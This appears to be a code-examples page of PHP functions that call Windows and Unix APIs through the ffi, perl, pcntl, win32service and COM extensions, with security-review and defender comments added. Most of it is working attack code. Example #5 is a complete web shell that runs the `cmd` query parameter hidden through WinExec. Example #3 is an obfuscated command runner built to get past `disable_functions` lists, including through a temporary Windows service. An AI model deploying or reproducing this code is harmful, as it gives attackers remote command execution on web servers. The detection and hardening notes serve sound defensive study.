/**
 * Runs a Windows command line through the `ffi` extension and returns what it wrote to stdout.
 *
 * Security review: this is a command-execution primitive of the kind used in PHP web shells.
 * It reaches kernel32's WinExec through FFI instead of exec()/system()/shell_exec()/passthru(),
 * so a `disable_functions` list that names only those functions does not cover it.
 * $command is interpolated into the cmd.exe line without quoting or validation.
 *
 * Defender notes:
 *  - Process telemetry: the web server's PHP worker spawning `cmd.exe /c ... >"<dir>\NJ<hex>"`.
 *  - File telemetry: short-lived files named "NJ" + uniqid() output, created and then deleted.
 *  - Worker behaviour: the wait loop below has no timeout, so a request can hang in sleep(1).
 *  - Hardening: do not load the ffi extension in web-facing SAPIs, and alert on any PHP source
 *    that declares `[lib='kernel32.dll']` bindings.
 *
 * @param string $command Command line handed to `cmd.exe /c`.
 * @return string|false Contents of the redirect file as returned by file_get_contents().
 */
function ffishelL($command)
{
    // Scratch file for the redirected output. whereistmP() is defined elsewhere;
    // presumably it returns a writable directory — confirm.
    $name = whereistmP() . "\\" . uniqid('NJ');
    // Bind WinExec from kernel32.dll through the ffi extension's IDL-style declaration.
    $api = new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
    // Second argument 0 is the show-window value (SW_HIDE): no console window appears.
    $res = $api->WinExec("cmd.exe /c {$command} >\"{$name}\"", 0);
    // WinExec's result in $res is never checked; the code polls for the redirect file instead.
    while (!file_exists($name)) {
        sleep(1);
    }
    $exec = file_get_contents($name);
    // The output file is removed after reading, so little remains on disk afterwards.
    unlink($name);
    return $exec;
}
Beispiel #2
 /**
  * Reads the four-part file version of a Windows executable through the `ffi` extension.
  *
  * Returns "?" unless DEBUG is truthy. With DEBUG on, it returns "a.b.c.d" built from the
  * high and low words of dwFileVersionMS / dwFileVersionLS. It falls off the end (null)
  * when ffi is unavailable or the version query fails.
  *
  * Review notes (memory safety: this code passes PHP-controlled sizes to native APIs):
  *  - NOTE(review): $size comes from GetFileVersionInfoSizeA and is passed as the buffer
  *    length, but $pVer is a single fixed-size struct. If the version resource is larger
  *    than that struct, the native call may write past the allocation inside the PHP
  *    process. This depends on how ffi_struct allocates; confirm before enabling.
  *  - NOTE(review): $size is not checked for 0 (no version resource) before the second call.
  *  - NOTE(review): the IDL binds both functions to kernel32.dll; the Win32 documentation
  *    lists GetFileVersionInfo* under version.dll. Confirm the library name.
  *  - NOTE(review): the IDL text contains "struct VS_VERSIONINFO { struct VS_VERSIONINFO",
  *    which looks like a paste error, and szKey[1] may not match the real key length,
  *    so the offset of Value is unverified.
  *  - $file goes to the native API unchanged; callers should only pass trusted paths.
  *
  * @param string $file Path of the file to inspect.
  * @return string|null "?" when DEBUG is off, a dotted version on success, otherwise null.
  */
 function exeversion_ffi($file)
 {
     if (!DEBUG) {
         return "?";
     }
     // not yet stable
     // NOTE(review): function_exists('ffi') tests for a *function* named ffi, while the code
     // below instantiates `ffi` as a class. In practice loadPhpExtension() (defined
     // elsewhere) probably decides this branch; confirm.
     if (function_exists('ffi') or loadPhpExtension('ffi')) {
         $win32_idl = "\nstruct VS_FIXEDFILEINFO {\n        DWORD dwSignature;\n        DWORD dwStrucVersion;\n        DWORD dwFileVersionMS;\n        DWORD dwFileVersionLS;\n        DWORD dwProductVersionMS;\n        DWORD dwProductVersionLS;\n        DWORD dwFileFlagsMask;\n        DWORD dwFileFlags;\n        DWORD dwFileOS;\n        DWORD dwFileType;\n        DWORD dwFileSubtype;\n        DWORD dwFileDateMS;\n        DWORD dwFileDateLS;\n};\nstruct VS_VERSIONINFO { struct VS_VERSIONINFO\n  WORD  wLength; \n  WORD  wValueLength; \n  WORD  wType; \n  WCHAR szKey[1]; \n  WORD  Padding1[1]; \n  VS_FIXEDFILEINFO Value; \n  WORD  Padding2[1]; \n  WORD  Children[1]; \n};\n[lib='kernel32.dll'] DWORD GetFileVersionInfoSizeA(char *szFileName, DWORD *dwVerHnd);\n[lib='kernel32.dll'] int GetFileVersionInfoA(char *sfnFile, DWORD dummy, DWORD size, struct VS_VERSIONINFO *pVer);\n";
         $ffi = new ffi($win32_idl);
         $dummy = 0;
         // &DWORD
         // Ask how many bytes the file's version resource occupies.
         $size = $ffi->GetFileVersionInfoSizeA($file, $dummy);
         //$pVer = str_repeat($size+1);
         // Destination is one VS_VERSIONINFO struct, not a buffer sized from $size (see header).
         $pVer = new ffi_struct($ffi, "VS_VERSIONINFO");
         if ($ffi->GetFileVersionInfoA($file, 0, $size, $pVer) and $pVer->wValueLength) {
             // analyze the VS_FIXEDFILEINFO(Value);
             // $pValue = new ffi_struct($ffi, "VS_FIXEDFILEINFO");
             $pValue =& $pVer->Value;
             // Each DWORD packs two 16-bit fields: the high word (>> 16) and the low word (& 0xffff).
             return sprintf("%d.%d.%d.%d", $pValue->dwFileVersionMS >> 16, $pValue->dwFileVersionMS & 0xffff, $pValue->dwFileVersionLS >> 16, $pValue->dwFileVersionLS & 0xffff);
         }
     }
 }
Beispiel #3
/**
 * Obfuscated command runner: executes $c through whichever non-standard execution path is
 * available on the host and returns the captured output.
 *
 * What the code shows:
 *  - Non-Windows ($win falsy): the `perl` extension (Perl system() inside eval, captured with
 *    output buffering); otherwise pcntl_fork() + pcntl_exec() of /usr/bin/perl or
 *    /usr/local/bin/perl, with output redirected to $tempdir . uniqid('pcntl').
 *  - Windows: ffi -> kernel32 WinExec, else a throw-away service created with win32service,
 *    else win32std's win_shell_execute(), else COM WScript.Shell->Run(). Each one redirects
 *    cmd.exe output to $tempdir . uniqid('NJ').
 *  - No path calls exec()/system()/shell_exec()/passthru()/proc_open(), so a
 *    `disable_functions` list limited to those names does not cover this function.
 *  - z7r(), z9p() and z6l() are defined elsewhere. Presumably they are "function usable?",
 *    "read file" and a command transform respectively — confirm against their definitions.
 *
 * Defender notes:
 *  - Static indicators: short meaningless identifiers (z6v, z7r, z9p, z6l), the
 *    `[lib='kernel32.dll'] int WinExec` IDL string, uniqid('NJ') / uniqid('pcntl') scratch
 *    names, and the literal "Blind Command Execution" message.
 *  - Host telemetry: web-server workers spawning cmd.exe or perl; services whose name and
 *    display name are "NJ<hex>" with cmd.exe as the binary path, created and deleted within
 *    moments (service-install event 7045 in the System log); wscript COM use from PHP.
 *  - Hardening: keep ffi, perl, pcntl, win32service, win32std and COM out of web-facing PHP
 *    builds, and run the web server account without rights to create services.
 *
 * @param string $c Command line to run; an empty value returns '' without doing anything.
 * @return mixed Output read back by z9p(), or the buffered output on the perl-extension path.
 */
function z6v($c)
{
    // $win (platform flag) and $tempdir (scratch directory prefix) are globals set elsewhere.
    global $win, $tempdir;
    $r = '';
    if (!empty($c)) {
        if (!$win) {
            if (extension_loaded('perl')) {
                // Perl extension path: output buffering collects whatever system() prints.
                @ob_start();
                $p = new perl();
                $p->eval("system('{$c}')");
                $r = @ob_get_contents();
                @ob_end_clean();
            } elseif (z7r('pcntl_exec') && z7r('pcntl_fork')) {
                $r = '[~] Blind Command Execution via [pcntl_exec]\\n\\n';
                // Scratch file that receives the child's redirected output.
                $o = $tempdir . uniqid('pcntl');
                $pid = @pcntl_fork();
                if ($pid == -1) {
                    $r .= '[-] Could not fork. Exit';
                } elseif ($pid) {
                    // Parent branch: reports a status string. $status is not assigned in this function.
                    $r .= @pcntl_wifexited($status) ? '[+] Done! Command "' . $c . '" successfully executed.' : '[-] Error. Incorrect Command.';
                } else {
                    // Child branch: replace the process image with perl running the command.
                    $c = array(" -e 'system(\"{$c} > {$o}\")'");
                    if (@pcntl_exec('/usr/bin/perl', $c)) {
                        exit(0);
                    }
                    if (@pcntl_exec('/usr/local/bin/perl', $c)) {
                        exit(0);
                    }
                    die;
                }
                // Overwrites the status text above with whatever z9p() returns for the scratch file.
                $r = z9p($o);
                @unlink($o);
            }
        } else {
            // Windows: every branch redirects cmd.exe output into this scratch file.
            $o = $tempdir . uniqid('NJ');
            if (extension_loaded('ffi')) {
                // FFI binding to kernel32!WinExec; 0 is the show-window value (hidden).
                $a = new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
                $r = $a->WinExec("cmd.exe /c " . z6l($c) . " >\"{$o}\"", 0);
                // Polls once per second with no timeout until the redirect file appears.
                while (!@file_exists($o)) {
                    sleep(1);
                }
                $r = z9p($o);
            } elseif (extension_loaded('win32service')) {
                // Temporary service whose binary is cmd.exe: created, started, stopped, deleted.
                $s = uniqid('NJ');
                @win32_create_service(array('service' => $s, 'display' => $s, 'path' => 'c:\\windows\\system32\\cmd.exe', 'params' => "/c " . z6l($c) . " >\"{$o}\""));
                @win32_start_service($s);
                @win32_stop_service($s);
                @win32_delete_service($s);
                while (!@file_exists($o)) {
                    sleep(1);
                }
                $r = z9p($o);
            } elseif (extension_loaded("win32std")) {
                // cmd.exe is addressed through a relative ..\ chain rather than an absolute path.
                @win_shell_execute('..\\..\\..\\..\\..\\..\\..\\windows\\system32\\cmd.exe /c ' . z6l($c) . ' > "' . $o . '"');
                while (!@file_exists($o)) {
                    sleep(1);
                }
                $r = z9p($o);
            } else {
                // Last resort: Windows Script Host through COM; no wait loop before reading.
                $a = new COM("WScript.Shell");
                $a->Run('c:\\windows\\system32\\cmd.exe /c ' . z6l($c) . ' > "' . $o . '"');
                $r = z9p($o);
            }
            // Scratch file removed after use; errors are suppressed.
            @unlink($o);
        }
    }
    return $r;
}
Beispiel #4
 /**
  * Starts a program through shell32's ShellExecuteA, bound via the `ffi` extension.
  *
  * The window is opened minimised and not activated (show value 7).
  *
  * Review notes:
  *  - $app and $startDir pass through tfb_shellencode() (defined elsewhere), but $params is
  *    handed to ShellExecuteA unchanged. NOTE(review): callers must not build $params from
  *    untrusted input unless they encode it themselves — confirm at the call sites.
  *  - The return value is whatever ShellExecuteA reports; this function does not interpret it.
  *
  * @param string $app      Program or document to open.
  * @param string $params   Argument string passed through as-is.
  * @param string $startDir Working directory for the new process.
  * @return mixed Raw ShellExecuteA result.
  */
 function win32_fork($app, $params = '', $startDir = '')
 {
     // Show values: 0 hidden, 1 normal, 2 minimised, 3 maximised, 4 inactive, 7 minimised + inactive.
     $windowMode = 7;
     $shell32 = new ffi("\n\t\t[lib='shell32.dll'] int ShellExecuteA(int handle, char *operation, char *file, char *param, char *directory, int show);\n\t\t");
     $encodedApp = tfb_shellencode($app);
     $encodedDir = tfb_shellencode($startDir);
     return $shell32->ShellExecuteA(0, "open", $encodedApp, $params, $encodedDir, $windowMode);
 }
Beispiel #5
##########################################################
// Security review: stand-alone web shell. It takes a command from the `cmd` query parameter,
// runs it through kernel32!WinExec via the ffi extension, and prints the output as HTML.
// It calls none of exec()/system()/shell_exec()/passthru(), so a `disable_functions` list
// restricted to those names does not block it. Its own error text calls it an "exploit".
//
// Defender notes:
//  - Web logs: requests to a .php file carrying a `cmd=` query parameter.
//  - Process telemetry: the PHP worker spawning `cmd.exe /c ... >"<dir>\NJ<hex>"`.
//  - File telemetry: "NJ" + uniqid() files appearing briefly in the script's own directory,
//    session.save_path or upload_tmp_dir.
//  - Hardening: do not load ffi in web-facing SAPIs, deny the web server account write access
//    to the document root, and monitor the web root for new PHP files.
if (!extension_loaded('ffi')) {
    die('ERROR: FFI extension is not loaded!');
}
// Attacker-controlled input; defaults to `dir` when the parameter is absent or empty.
$command = empty($_GET['cmd']) ? 'dir' : $_GET['cmd'];
// Pick the first writable location for the output file: script directory, then the session
// store, then the upload temp directory.
if (is_writeable(dirname(__FILE__))) {
    $tmp = dirname(__FILE__);
} elseif (is_writeable(ini_get('session.save_path'))) {
    $tmp = ini_get('session.save_path');
} elseif (is_writeable(ini_get('upload_tmp_dir'))) {
    $tmp = ini_get('upload_tmp_dir');
} else {
    die('ERROR: Move exploit to writeable folder.');
}
$output = "{$tmp}\\" . uniqid('NJ');
// FFI binding to WinExec; the request value is interpolated into the cmd.exe line unquoted.
$api = new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
$res = $api->WinExec("cmd.exe /c {$command} >\"{$output}\"", 0);
// Polls once per second, with no timeout, until the redirect file exists.
while (!file_exists($output)) {
    sleep(1);
}
$con = '';
$fp = fopen($output, 'r');
while (!feof($fp)) {
    $con .= fgets($fp, 1024);
}
fclose($fp);
// Output is HTML-escaped only so it renders inside <pre>; this does not limit execution.
$con = htmlspecialchars($con);
echo "<pre>{$con}</pre>";
// The output file is deleted after the response is built.
unlink($output);
?>